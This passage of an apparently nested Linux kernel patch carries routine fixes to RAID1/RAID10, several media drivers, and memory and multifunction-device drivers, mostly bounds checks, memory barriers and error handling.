+@@ -3843,7 +3844,7 @@ safe_delay_store(struct mddev *mddev, const char *cbuf, size_t len)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (strict_strtoul_scaled(cbuf, &msec, 3) < 0)
++	if (strict_strtoul_scaled(cbuf, &msec, 3) < 0 || msec > UINT_MAX / HZ)
+ 		return -EINVAL;
+ 	if (msec == 0)
+ 		mddev->safemode_delay = 0;
+@@ -4512,6 +4513,8 @@ max_corrected_read_errors_store(struct mddev *mddev, const char *buf, size_t len
+ 	rv = kstrtouint(buf, 10, &n);
+ 	if (rv < 0)
+ 		return rv;
++	if (n > INT_MAX)
++		return -EINVAL;
+ 	atomic_set(&mddev->max_corr_read_errors, n);
+ 	return len;
+ }
+diff --git a/drivers/md/raid1-10.c b/drivers/md/raid1-10.c
+index e61f6cad4e08e..e0c8ac8146331 100644
+--- a/drivers/md/raid1-10.c
++++ b/drivers/md/raid1-10.c
+@@ -109,3 +109,45 @@ static void md_bio_reset_resync_pages(struct bio *bio, struct resync_pages *rp,
+ 		size -= len;
+ 	} while (idx++ < RESYNC_PAGES && size > 0);
+ }
++
++
++static inline void raid1_submit_write(struct bio *bio)
++{
++	struct md_rdev *rdev = (void *)bio->bi_bdev;
++
++	bio->bi_next = NULL;
++	bio_set_dev(bio, rdev->bdev);
++	if (test_bit(Faulty, &rdev->flags))
++		bio_io_error(bio);
++	else if (unlikely(bio_op(bio) ==  REQ_OP_DISCARD &&
++			  !bdev_max_discard_sectors(bio->bi_bdev)))
++		/* Just ignore it */
++		bio_endio(bio);
++	else
++		submit_bio_noacct(bio);
++}
++
++static inline bool raid1_add_bio_to_plug(struct mddev *mddev, struct bio *bio,
++				      blk_plug_cb_fn unplug)
++{
++	struct raid1_plug_cb *plug = NULL;
++	struct blk_plug_cb *cb;
++
++	/*
++	 * If bitmap is not enabled, it's safe to submit the io directly, and
++	 * this can get optimal performance.
++	 */
++	if (!md_bitmap_enabled(mddev->bitmap)) {
++		raid1_submit_write(bio);
++		return true;
++	}
++
++	cb = blk_check_plugged(unplug, mddev, sizeof(*plug));
++	if (!cb)
++		return false;
++
++	plug = container_of(cb, struct raid1_plug_cb, cb);
++	bio_list_add(&plug->pending, bio);
++
++	return true;
++}
+diff --git a/drivers/md/raid1.c b/drivers/md/raid1.c
+index 58f705f429480..ac64c587191b9 100644
+--- a/drivers/md/raid1.c
++++ b/drivers/md/raid1.c
+@@ -799,17 +799,8 @@ static void flush_bio_list(struct r1conf *conf, struct bio *bio)
+ 
+ 	while (bio) { /* submit pending writes */
+ 		struct bio *next = bio->bi_next;
+-		struct md_rdev *rdev = (void *)bio->bi_bdev;
+-		bio->bi_next = NULL;
+-		bio_set_dev(bio, rdev->bdev);
+-		if (test_bit(Faulty, &rdev->flags)) {
+-			bio_io_error(bio);
+-		} else if (unlikely((bio_op(bio) == REQ_OP_DISCARD) &&
+-				    !bdev_max_discard_sectors(bio->bi_bdev)))
+-			/* Just ignore it */
+-			bio_endio(bio);
+-		else
+-			submit_bio_noacct(bio);
++
++		raid1_submit_write(bio);
+ 		bio = next;
+ 		cond_resched();
+ 	}
+@@ -1343,8 +1334,6 @@ static void raid1_write_request(struct mddev *mddev, struct bio *bio,
+ 	struct bitmap *bitmap = mddev->bitmap;
+ 	unsigned long flags;
+ 	struct md_rdev *blocked_rdev;
+-	struct blk_plug_cb *cb;
+-	struct raid1_plug_cb *plug = NULL;
+ 	int first_clone;
+ 	int max_sectors;
+ 	bool write_behind = false;
+@@ -1573,15 +1562,7 @@ static void raid1_write_request(struct mddev *mddev, struct bio *bio,
+ 					      r1_bio->sector);
+ 		/* flush_pending_writes() needs access to the rdev so...*/
+ 		mbio->bi_bdev = (void *)rdev;
+-
+-		cb = blk_check_plugged(raid1_unplug, mddev, sizeof(*plug));
+-		if (cb)
+-			plug = container_of(cb, struct raid1_plug_cb, cb);
+-		else
+-			plug = NULL;
+-		if (plug) {
+-			bio_list_add(&plug->pending, mbio);
+-		} else {
++		if (!raid1_add_bio_to_plug(mddev, mbio, raid1_unplug)) {
+ 			spin_lock_irqsave(&conf->device_lock, flags);
+ 			bio_list_add(&conf->pending_bio_list, mbio);
+ 			spin_unlock_irqrestore(&conf->device_lock, flags);
+diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c
+index 67398394cc9c9..d2098fcd6a270 100644
+--- a/drivers/md/raid10.c
++++ b/drivers/md/raid10.c
+@@ -325,7 +325,7 @@ static void raid_end_bio_io(struct r10bio *r10_bio)
+ 	if (!test_bit(R10BIO_Uptodate, &r10_bio->state))
+ 		bio->bi_status = BLK_STS_IOERR;
+ 
+-	if (blk_queue_io_stat(bio->bi_bdev->bd_disk->queue))
++	if (r10_bio->start_time)
+ 		bio_end_io_acct(bio, r10_bio->start_time);
+ 	bio_endio(bio);
+ 	/*
+@@ -779,8 +779,16 @@ static struct md_rdev *read_balance(struct r10conf *conf,
+ 		disk = r10_bio->devs[slot].devnum;
+ 		rdev = rcu_dereference(conf->mirrors[disk].replacement);
+ 		if (rdev == NULL || test_bit(Faulty, &rdev->flags) ||
+-		    r10_bio->devs[slot].addr + sectors > rdev->recovery_offset)
++		    r10_bio->devs[slot].addr + sectors >
++		    rdev->recovery_offset) {
++			/*
++			 * Read replacement first to prevent reading both rdev
++			 * and replacement as NULL during replacement replace
++			 * rdev.
++			 */
++			smp_mb();
+ 			rdev = rcu_dereference(conf->mirrors[disk].rdev);
++		}
+ 		if (rdev == NULL ||
+ 		    test_bit(Faulty, &rdev->flags))
+ 			continue;
+@@ -909,17 +917,8 @@ static void flush_pending_writes(struct r10conf *conf)
+ 
+ 		while (bio) { /* submit pending writes */
+ 			struct bio *next = bio->bi_next;
+-			struct md_rdev *rdev = (void*)bio->bi_bdev;
+-			bio->bi_next = NULL;
+-			bio_set_dev(bio, rdev->bdev);
+-			if (test_bit(Faulty, &rdev->flags)) {
+-				bio_io_error(bio);
+-			} else if (unlikely((bio_op(bio) ==  REQ_OP_DISCARD) &&
+-					    !bdev_max_discard_sectors(bio->bi_bdev)))
+-				/* Just ignore it */
+-				bio_endio(bio);
+-			else
+-				submit_bio_noacct(bio);
++
++			raid1_submit_write(bio);
+ 			bio = next;
+ 		}
+ 		blk_finish_plug(&plug);
+@@ -1128,17 +1127,8 @@ static void raid10_unplug(struct blk_plug_cb *cb, bool from_schedule)
+ 
+ 	while (bio) { /* submit pending writes */
+ 		struct bio *next = bio->bi_next;
+-		struct md_rdev *rdev = (void*)bio->bi_bdev;
+-		bio->bi_next = NULL;
+-		bio_set_dev(bio, rdev->bdev);
+-		if (test_bit(Faulty, &rdev->flags)) {
+-			bio_io_error(bio);
+-		} else if (unlikely((bio_op(bio) ==  REQ_OP_DISCARD) &&
+-				    !bdev_max_discard_sectors(bio->bi_bdev)))
+-			/* Just ignore it */
+-			bio_endio(bio);
+-		else
+-			submit_bio_noacct(bio);
++
++		raid1_submit_write(bio);
+ 		bio = next;
+ 	}
+ 	kfree(plug);
+@@ -1280,8 +1270,6 @@ static void raid10_write_one_disk(struct mddev *mddev, struct r10bio *r10_bio,
+ 	const blk_opf_t do_sync = bio->bi_opf & REQ_SYNC;
+ 	const blk_opf_t do_fua = bio->bi_opf & REQ_FUA;
+ 	unsigned long flags;
+-	struct blk_plug_cb *cb;
+-	struct raid1_plug_cb *plug = NULL;
+ 	struct r10conf *conf = mddev->private;
+ 	struct md_rdev *rdev;
+ 	int devnum = r10_bio->devs[n_copy].devnum;
+@@ -1321,14 +1309,7 @@ static void raid10_write_one_disk(struct mddev *mddev, struct r10bio *r10_bio,
+ 
+ 	atomic_inc(&r10_bio->remaining);
+ 
+-	cb = blk_check_plugged(raid10_unplug, mddev, sizeof(*plug));
+-	if (cb)
+-		plug = container_of(cb, struct raid1_plug_cb, cb);
+-	else
+-		plug = NULL;
+-	if (plug) {
+-		bio_list_add(&plug->pending, mbio);
+-	} else {
++	if (!raid1_add_bio_to_plug(mddev, mbio, raid10_unplug)) {
+ 		spin_lock_irqsave(&conf->device_lock, flags);
+ 		bio_list_add(&conf->pending_bio_list, mbio);
+ 		spin_unlock_irqrestore(&conf->device_lock, flags);
+@@ -1477,9 +1458,15 @@ static void raid10_write_request(struct mddev *mddev, struct bio *bio,
+ 
+ 	for (i = 0;  i < conf->copies; i++) {
+ 		int d = r10_bio->devs[i].devnum;
+-		struct md_rdev *rdev = rcu_dereference(conf->mirrors[d].rdev);
+-		struct md_rdev *rrdev = rcu_dereference(
+-			conf->mirrors[d].replacement);
++		struct md_rdev *rdev, *rrdev;
++
++		rrdev = rcu_dereference(conf->mirrors[d].replacement);
++		/*
++		 * Read replacement first to prevent reading both rdev and
++		 * replacement as NULL during replacement replace rdev.
++		 */
++		smp_mb();
++		rdev = rcu_dereference(conf->mirrors[d].rdev);
+ 		if (rdev == rrdev)
+ 			rrdev = NULL;
+ 		if (rdev && (test_bit(Faulty, &rdev->flags)))
+@@ -3436,7 +3423,6 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 			int must_sync;
+ 			int any_working;
+ 			int need_recover = 0;
+-			int need_replace = 0;
+ 			struct raid10_info *mirror = &conf->mirrors[i];
+ 			struct md_rdev *mrdev, *mreplace;
+ 
+@@ -3448,11 +3434,10 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 			    !test_bit(Faulty, &mrdev->flags) &&
+ 			    !test_bit(In_sync, &mrdev->flags))
+ 				need_recover = 1;
+-			if (mreplace != NULL &&
+-			    !test_bit(Faulty, &mreplace->flags))
+-				need_replace = 1;
++			if (mreplace && test_bit(Faulty, &mreplace->flags))
++				mreplace = NULL;
+ 
+-			if (!need_recover && !need_replace) {
++			if (!need_recover && !mreplace) {
+ 				rcu_read_unlock();
+ 				continue;
+ 			}
+@@ -3468,8 +3453,6 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 				rcu_read_unlock();
+ 				continue;
+ 			}
+-			if (mreplace && test_bit(Faulty, &mreplace->flags))
+-				mreplace = NULL;
+ 			/* Unless we are doing a full sync, or a replacement
+ 			 * we only need to recover the block if it is set in
+ 			 * the bitmap
+@@ -3592,11 +3575,11 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 				bio = r10_bio->devs[1].repl_bio;
+ 				if (bio)
+ 					bio->bi_end_io = NULL;
+-				/* Note: if need_replace, then bio
++				/* Note: if replace is not NULL, then bio
+ 				 * cannot be NULL as r10buf_pool_alloc will
+ 				 * have allocated it.
+ 				 */
+-				if (!need_replace)
++				if (!mreplace)
+ 					break;
+ 				bio->bi_next = biolist;
+ 				biolist = bio;
+diff --git a/drivers/media/cec/i2c/Kconfig b/drivers/media/cec/i2c/Kconfig
+index 70432a1d69186..d912d143fb312 100644
+--- a/drivers/media/cec/i2c/Kconfig
++++ b/drivers/media/cec/i2c/Kconfig
+@@ -5,6 +5,7 @@
+ config CEC_CH7322
+ 	tristate "Chrontel CH7322 CEC controller"
+ 	depends on I2C
++	select REGMAP
+ 	select REGMAP_I2C
+ 	select CEC_CORE
+ 	help
+diff --git a/drivers/media/i2c/hi846.c b/drivers/media/i2c/hi846.c
+index 306dc35e925fd..f8709cdf28b39 100644
+--- a/drivers/media/i2c/hi846.c
++++ b/drivers/media/i2c/hi846.c
+@@ -1353,7 +1353,8 @@ static int hi846_set_ctrl(struct v4l2_ctrl *ctrl)
+ 					 exposure_max);
+ 	}
+ 
+-	if (!pm_runtime_get_if_in_use(&client->dev))
++	ret = pm_runtime_get_if_in_use(&client->dev);
++	if (!ret || ret == -EAGAIN)
+ 		return 0;
+ 
+ 	switch (ctrl->id) {
+diff --git a/drivers/media/i2c/st-mipid02.c b/drivers/media/i2c/st-mipid02.c
+index 31b89aff0e86a..f20f87562bf11 100644
+--- a/drivers/media/i2c/st-mipid02.c
++++ b/drivers/media/i2c/st-mipid02.c
+@@ -736,8 +736,13 @@ static void mipid02_set_fmt_source(struct v4l2_subdev *sd,
+ {
+ 	struct mipid02_dev *bridge = to_mipid02_dev(sd);
+ 
+-	/* source pad mirror active sink pad */
+-	format->format = bridge->fmt;
++	/* source pad mirror sink pad */
++	if (format->which == V4L2_SUBDEV_FORMAT_ACTIVE)
++		format->format = bridge->fmt;
++	else
++		format->format = *v4l2_subdev_get_try_format(sd, sd_state,
++							     MIPID02_SINK_0);
++
+ 	/* but code may need to be converted */
+ 	format->format.code = serial_to_parallel_code(format->format.code);
+ 
+diff --git a/drivers/media/platform/amphion/vdec.c b/drivers/media/platform/amphion/vdec.c
+index 4918547793dc1..c08b5a2bfc1df 100644
+--- a/drivers/media/platform/amphion/vdec.c
++++ b/drivers/media/platform/amphion/vdec.c
+@@ -229,6 +229,7 @@ static void vdec_handle_resolution_change(struct vpu_inst *inst)
+ 
+ 	vdec->source_change--;
+ 	vpu_notify_source_change(inst);
++	vpu_set_last_buffer_dequeued(inst, false);
+ }
+ 
+ static int vdec_update_state(struct vpu_inst *inst, enum vpu_codec_state state, u32 force)
+@@ -264,7 +265,7 @@ static void vdec_set_last_buffer_dequeued(struct vpu_inst *inst)
+ 		return;
+ 
+ 	if (vdec->eos_received) {
+-		if (!vpu_set_last_buffer_dequeued(inst)) {
++		if (!vpu_set_last_buffer_dequeued(inst, true)) {
+ 			vdec->eos_received--;
+ 			vdec_update_state(inst, VPU_CODEC_STATE_DRAIN, 0);
+ 		}
+@@ -517,7 +518,7 @@ static int vdec_drain(struct vpu_inst *inst)
+ 		return 0;
+ 
+ 	if (!vdec->params.frame_count) {
+-		vpu_set_last_buffer_dequeued(inst);
++		vpu_set_last_buffer_dequeued(inst, true);
+ 		return 0;
+ 	}
+ 
+@@ -556,7 +557,7 @@ static int vdec_cmd_stop(struct vpu_inst *inst)
+ 	vpu_trace(inst->dev, "[%d]\n", inst->id);
+ 
+ 	if (inst->state == VPU_CODEC_STATE_DEINIT) {
+-		vpu_set_last_buffer_dequeued(inst);
++		vpu_set_last_buffer_dequeued(inst, true);
+ 	} else {
+ 		vdec->drain = 1;
+ 		vdec_drain(inst);
+diff --git a/drivers/media/platform/amphion/venc.c b/drivers/media/platform/amphion/venc.c
+index 37212f087fdd9..e8cb22da938e6 100644
+--- a/drivers/media/platform/amphion/venc.c
++++ b/drivers/media/platform/amphion/venc.c
+@@ -468,7 +468,7 @@ static int venc_encoder_cmd(struct file *file, void *fh, struct v4l2_encoder_cmd
+ 	vpu_inst_lock(inst);
+ 	if (cmd->cmd == V4L2_ENC_CMD_STOP) {
+ 		if (inst->state == VPU_CODEC_STATE_DEINIT)
+-			vpu_set_last_buffer_dequeued(inst);
++			vpu_set_last_buffer_dequeued(inst, true);
+ 		else
+ 			venc_request_eos(inst);
+ 	}
+@@ -888,7 +888,7 @@ static void venc_set_last_buffer_dequeued(struct vpu_inst *inst)
+ 	struct venc_t *venc = inst->priv;
+ 
+ 	if (venc->stopped && list_empty(&venc->frames))
+-		vpu_set_last_buffer_dequeued(inst);
++		vpu_set_last_buffer_dequeued(inst, true);
+ }
+ 
+ static void venc_stop_done(struct vpu_inst *inst)
+diff --git a/drivers/media/platform/amphion/vpu_malone.c b/drivers/media/platform/amphion/vpu_malone.c
+index ae094cdc9bfc8..c2f4fb12c3b64 100644
+--- a/drivers/media/platform/amphion/vpu_malone.c
++++ b/drivers/media/platform/amphion/vpu_malone.c
+@@ -1286,6 +1286,15 @@ static int vpu_malone_insert_scode_pic(struct malone_scode_t *scode, u32 codec_i
+ 	return sizeof(hdr);
+ }
+ 
++static int vpu_malone_insert_scode_vc1_g_seq(struct malone_scode_t *scode)
++{
++	if (!scode->inst->total_input_count)
++		return 0;
++	if (vpu_vb_is_codecconfig(to_vb2_v4l2_buffer(scode->vb)))
++		scode->need_data = 0;
++	return 0;
++}
++
+ static int vpu_malone_insert_scode_vc1_g_pic(struct malone_scode_t *scode)
+ {
+ 	struct vb2_v4l2_buffer *vbuf;
+@@ -1317,6 +1326,8 @@ static int vpu_malone_insert_scode_vc1_l_seq(struct malone_scode_t *scode)
+ 	int size = 0;
+ 	u8 rcv_seqhdr[MALONE_VC1_RCV_SEQ_HEADER_LEN];
+ 
++	if (vpu_vb_is_codecconfig(to_vb2_v4l2_buffer(scode->vb)))
++		scode->need_data = 0;
+ 	if (scode->inst->total_input_count)
+ 		return 0;
+ 	scode->need_data = 0;
+@@ -1421,6 +1432,7 @@ static const struct malone_scode_handler scode_handlers[] = {
+ 	},
+ 	{
+ 		.pixelformat = V4L2_PIX_FMT_VC1_ANNEX_G,
++		.insert_scode_seq = vpu_malone_insert_scode_vc1_g_seq,
+ 		.insert_scode_pic = vpu_malone_insert_scode_vc1_g_pic,
+ 	},
+ 	{
+diff --git a/drivers/media/platform/amphion/vpu_v4l2.c b/drivers/media/platform/amphion/vpu_v4l2.c
+index 590d1084e5a5d..a74953191c221 100644
+--- a/drivers/media/platform/amphion/vpu_v4l2.c
++++ b/drivers/media/platform/amphion/vpu_v4l2.c
+@@ -100,7 +100,7 @@ int vpu_notify_source_change(struct vpu_inst *inst)
+ 	return 0;
+ }
+ 
+-int vpu_set_last_buffer_dequeued(struct vpu_inst *inst)
++int vpu_set_last_buffer_dequeued(struct vpu_inst *inst, bool eos)
+ {
+ 	struct vb2_queue *q;
+ 
+@@ -116,7 +116,8 @@ int vpu_set_last_buffer_dequeued(struct vpu_inst *inst)
+ 	vpu_trace(inst->dev, "last buffer dequeued\n");
+ 	q->last_buffer_dequeued = true;
+ 	wake_up(&q->done_wq);
+-	vpu_notify_eos(inst);
++	if (eos)
++		vpu_notify_eos(inst);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/media/platform/amphion/vpu_v4l2.h b/drivers/media/platform/amphion/vpu_v4l2.h
+index 795ca33a6a507..000af24a06ba0 100644
+--- a/drivers/media/platform/amphion/vpu_v4l2.h
++++ b/drivers/media/platform/amphion/vpu_v4l2.h
+@@ -26,7 +26,7 @@ struct vb2_v4l2_buffer *vpu_find_buf_by_idx(struct vpu_inst *inst, u32 type, u32
+ void vpu_v4l2_set_error(struct vpu_inst *inst);
+ int vpu_notify_eos(struct vpu_inst *inst);
+ int vpu_notify_source_change(struct vpu_inst *inst);
+-int vpu_set_last_buffer_dequeued(struct vpu_inst *inst);
++int vpu_set_last_buffer_dequeued(struct vpu_inst *inst, bool eos);
+ void vpu_vb2_buffers_return(struct vpu_inst *inst, unsigned int type, enum vb2_buffer_state state);
+ int vpu_get_num_buffers(struct vpu_inst *inst, u32 type);
+ bool vpu_is_source_empty(struct vpu_inst *inst);
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+index f3073d1e7f420..03f8d7cd8eddc 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+@@ -71,7 +71,6 @@ static void vdec_msg_queue_dec(struct vdec_msg_queue *msg_queue, int hardware_in
+ int vdec_msg_queue_qbuf(struct vdec_msg_queue_ctx *msg_ctx, struct vdec_lat_buf *buf)
+ {
+ 	struct list_head *head;
+-	int status;
+ 
+ 	head = vdec_get_buf_list(msg_ctx->hardware_index, buf);
+ 	if (!head) {
+@@ -87,12 +86,9 @@ int vdec_msg_queue_qbuf(struct vdec_msg_queue_ctx *msg_ctx, struct vdec_lat_buf
+ 	if (msg_ctx->hardware_index != MTK_VDEC_CORE) {
+ 		wake_up_all(&msg_ctx->ready_to_use);
+ 	} else {
+-		if (buf->ctx->msg_queue.core_work_cnt <
+-			atomic_read(&buf->ctx->msg_queue.core_list_cnt)) {
+-			status = queue_work(buf->ctx->dev->core_workqueue,
+-					    &buf->ctx->msg_queue.core_work);
+-			if (status)
+-				buf->ctx->msg_queue.core_work_cnt++;
++		if (!(buf->ctx->msg_queue.status & CONTEXT_LIST_QUEUED)) {
++			queue_work(buf->ctx->dev->core_workqueue, &buf->ctx->msg_queue.core_work);
++			buf->ctx->msg_queue.status |= CONTEXT_LIST_QUEUED;
+ 		}
+ 	}
+ 
+@@ -261,7 +257,10 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 		container_of(msg_queue, struct mtk_vcodec_ctx, msg_queue);
+ 	struct mtk_vcodec_dev *dev = ctx->dev;
+ 	struct vdec_lat_buf *lat_buf;
+-	int status;
++
++	spin_lock(&ctx->dev->msg_queue_core_ctx.ready_lock);
++	ctx->msg_queue.status &= ~CONTEXT_LIST_QUEUED;
++	spin_unlock(&ctx->dev->msg_queue_core_ctx.ready_lock);
+ 
+ 	lat_buf = vdec_msg_queue_dqbuf(&dev->msg_queue_core_ctx);
+ 	if (!lat_buf)
+@@ -278,17 +277,13 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 	vdec_msg_queue_qbuf(&ctx->msg_queue.lat_ctx, lat_buf);
+ 
+ 	wake_up_all(&ctx->msg_queue.core_dec_done);
+-	spin_lock(&dev->msg_queue_core_ctx.ready_lock);
+-	lat_buf->ctx->msg_queue.core_work_cnt--;
+-
+-	if (lat_buf->ctx->msg_queue.core_work_cnt <
+-		atomic_read(&lat_buf->ctx->msg_queue.core_list_cnt)) {
+-		status = queue_work(lat_buf->ctx->dev->core_workqueue,
+-				    &lat_buf->ctx->msg_queue.core_work);
+-		if (status)
+-			lat_buf->ctx->msg_queue.core_work_cnt++;
++	if (!(ctx->msg_queue.status & CONTEXT_LIST_QUEUED) &&
++	    atomic_read(&msg_queue->core_list_cnt)) {
++		spin_lock(&ctx->dev->msg_queue_core_ctx.ready_lock);
++		ctx->msg_queue.status |= CONTEXT_LIST_QUEUED;
++		spin_unlock(&ctx->dev->msg_queue_core_ctx.ready_lock);
++		queue_work(ctx->dev->core_workqueue, &msg_queue->core_work);
+ 	}
+-	spin_unlock(&dev->msg_queue_core_ctx.ready_lock);
+ }
+ 
+ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+@@ -303,13 +298,13 @@ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+ 		return 0;
+ 
+ 	msg_queue->ctx = ctx;
+-	msg_queue->core_work_cnt = 0;
+ 	vdec_msg_queue_init_ctx(&msg_queue->lat_ctx, MTK_VDEC_LAT0);
+ 	INIT_WORK(&msg_queue->core_work, vdec_msg_queue_core_work);
+ 
+ 	atomic_set(&msg_queue->lat_list_cnt, 0);
+ 	atomic_set(&msg_queue->core_list_cnt, 0);
+ 	init_waitqueue_head(&msg_queue->core_dec_done);
++	msg_queue->status = CONTEXT_LIST_EMPTY;
+ 
+ 	msg_queue->wdma_addr.size =
+ 		vde_msg_queue_get_trans_size(ctx->picinfo.buf_w,
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
+index a5d44bc97c16b..8f82d14847726 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
+@@ -21,6 +21,18 @@ struct mtk_vcodec_ctx;
+ struct mtk_vcodec_dev;
+ typedef int (*core_decode_cb_t)(struct vdec_lat_buf *lat_buf);
+ 
++/**
++ * enum core_ctx_status - Context decode status for core hardwre.
++ * @CONTEXT_LIST_EMPTY: No buffer queued on core hardware(must always be 0)
++ * @CONTEXT_LIST_QUEUED: Buffer queued to core work list
++ * @CONTEXT_LIST_DEC_DONE: context decode done
++ */
++enum core_ctx_status {
++	CONTEXT_LIST_EMPTY = 0,
++	CONTEXT_LIST_QUEUED,
++	CONTEXT_LIST_DEC_DONE,
++};
++
+ /**
+  * struct vdec_msg_queue_ctx - represents a queue for buffers ready to be processed
+  * @ready_to_use: ready used queue used to signalize when get a job queue
+@@ -77,7 +89,7 @@ struct vdec_lat_buf {
+  * @lat_list_cnt: used to record each instance lat list count
+  * @core_list_cnt: used to record each instance core list count
+  * @core_dec_done: core work queue decode done event
+- * @core_work_cnt: the number of core work in work queue
++ * @status: current context decode status for core hardware
+  */
+ struct vdec_msg_queue {
+ 	struct vdec_lat_buf lat_buf[NUM_BUFFER_COUNT];
+@@ -93,7 +105,7 @@ struct vdec_msg_queue {
+ 	atomic_t lat_list_cnt;
+ 	atomic_t core_list_cnt;
+ 	wait_queue_head_t core_dec_done;
+-	int core_work_cnt;
++	int status;
+ };
+ 
+ /**
+diff --git a/drivers/media/platform/qcom/venus/helpers.c b/drivers/media/platform/qcom/venus/helpers.c
+index ab6a29ffc81e2..ca6555bdc92fa 100644
+--- a/drivers/media/platform/qcom/venus/helpers.c
++++ b/drivers/media/platform/qcom/venus/helpers.c
+@@ -1036,8 +1036,8 @@ static u32 get_framesize_raw_yuv420_tp10_ubwc(u32 width, u32 height)
+ 	u32 extradata = SZ_16K;
+ 	u32 size;
+ 
+-	y_stride = ALIGN(ALIGN(width, 192) * 4 / 3, 256);
+-	uv_stride = ALIGN(ALIGN(width, 192) * 4 / 3, 256);
++	y_stride = ALIGN(width * 4 / 3, 256);
++	uv_stride = ALIGN(width * 4 / 3, 256);
+ 	y_sclines = ALIGN(height, 16);
+ 	uv_sclines = ALIGN((height + 1) >> 1, 16);
+ 
+diff --git a/drivers/media/usb/dvb-usb-v2/az6007.c b/drivers/media/usb/dvb-usb-v2/az6007.c
+index 62ee09f28a0bc..7524c90f5da61 100644
+--- a/drivers/media/usb/dvb-usb-v2/az6007.c
++++ b/drivers/media/usb/dvb-usb-v2/az6007.c
+@@ -202,7 +202,8 @@ static int az6007_rc_query(struct dvb_usb_device *d)
+ 	unsigned code;
+ 	enum rc_proto proto;
+ 
+-	az6007_read(d, AZ6007_READ_IR, 0, 0, st->data, 10);
++	if (az6007_read(d, AZ6007_READ_IR, 0, 0, st->data, 10) < 0)
++		return -EIO;
+ 
+ 	if (st->data[1] == 0x44)
+ 		return 0;
+diff --git a/drivers/media/usb/siano/smsusb.c b/drivers/media/usb/siano/smsusb.c
+index 6f443c542c6da..640737d3b8aeb 100644
+--- a/drivers/media/usb/siano/smsusb.c
++++ b/drivers/media/usb/siano/smsusb.c
+@@ -179,7 +179,8 @@ static void smsusb_stop_streaming(struct smsusb_device_t *dev)
+ 
+ 	for (i = 0; i < MAX_URBS; i++) {
+ 		usb_kill_urb(&dev->surbs[i].urb);
+-		cancel_work_sync(&dev->surbs[i].wq);
++		if (dev->surbs[i].wq.func)
++			cancel_work_sync(&dev->surbs[i].wq);
+ 
+ 		if (dev->surbs[i].cb) {
+ 			smscore_putbuffer(dev->coredev, dev->surbs[i].cb);
+diff --git a/drivers/memory/brcmstb_dpfe.c b/drivers/memory/brcmstb_dpfe.c
+index 76c82e9c8fceb..9339f80b21c50 100644
+--- a/drivers/memory/brcmstb_dpfe.c
++++ b/drivers/memory/brcmstb_dpfe.c
+@@ -434,15 +434,17 @@ static void __finalize_command(struct brcmstb_dpfe_priv *priv)
+ static int __send_command(struct brcmstb_dpfe_priv *priv, unsigned int cmd,
+ 			  u32 result[])
+ {
+-	const u32 *msg = priv->dpfe_api->command[cmd];
+ 	void __iomem *regs = priv->regs;
+ 	unsigned int i, chksum, chksum_idx;
++	const u32 *msg;
+ 	int ret = 0;
+ 	u32 resp;
+ 
+ 	if (cmd >= DPFE_CMD_MAX)
+ 		return -1;
+ 
++	msg = priv->dpfe_api->command[cmd];
++
+ 	mutex_lock(&priv->lock);
+ 
+ 	/* Wait for DCPU to become ready */
+diff --git a/drivers/memstick/host/r592.c b/drivers/memstick/host/r592.c
+index 42bfc46842b82..461f5ffd02bc1 100644
+--- a/drivers/memstick/host/r592.c
++++ b/drivers/memstick/host/r592.c
+@@ -44,12 +44,10 @@ static const char *tpc_names[] = {
+  * memstick_debug_get_tpc_name - debug helper that returns string for
+  * a TPC number
+  */
+-const char *memstick_debug_get_tpc_name(int tpc)
++static __maybe_unused const char *memstick_debug_get_tpc_name(int tpc)
+ {
+ 	return tpc_names[tpc-1];
+ }
+-EXPORT_SYMBOL(memstick_debug_get_tpc_name);
+-
+ 
+ /* Read a register*/
+ static inline u32 r592_read_reg(struct r592_device *dev, int address)
+diff --git a/drivers/mfd/intel-lpss-acpi.c b/drivers/mfd/intel-lpss-acpi.c
+index a143c8dca2d93..212818aef93e2 100644
+--- a/drivers/mfd/intel-lpss-acpi.c
++++ b/drivers/mfd/intel-lpss-acpi.c
+@@ -183,6 +183,9 @@ static int intel_lpss_acpi_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	info->mem = platform_get_resource(pdev, IORESOURCE_MEM, 0);
++	if (!info->mem)
++		return -ENODEV;
++
+ 	info->irq = platform_get_irq(pdev, 0);
+ 
+ 	ret = intel_lpss_probe(&pdev->dev, info);
+diff --git a/drivers/mfd/rt5033.c b/drivers/mfd/rt5033.c
+index f1236a9acf304..df095e91e2666 100644
+--- a/drivers/mfd/rt5033.c
++++ b/drivers/mfd/rt5033.c
+@@ -41,9 +41,6 @@ static const struct mfd_cell rt5033_devs[] = {
+ 	{
+ 		.name = "rt5033-charger",
+ 		.of_compatible = "richtek,rt5033-charger",
+-	}, {
+-		.name = "rt5033-battery",
+-		.of_compatible = "richtek,rt5033-battery",
+ 	}, {
+ 		.name = "rt5033-led",
+ 		.of_compatible = "richtek,rt5033-led",
+diff --git a/drivers/mfd/stmfx.c b/drivers/mfd/stmfx.c
+index 5dd7d96884596..b1ecd85ad2a8a 100644
+--- a/drivers/mfd/stmfx.c
++++ b/drivers/mfd/stmfx.c
+@@ -330,9 +330,8 @@ static int stmfx_chip_init(struct i2c_client *client)
+ 	stmfx->vdd = devm_regulator_get_optional(&client->dev, "vdd");
+ 	ret = PTR_ERR_OR_ZERO(stmfx->vdd);
+ 	if (ret) {
+-		if (ret == -ENODEV)
+-			stmfx->vdd = NULL;
+-		else
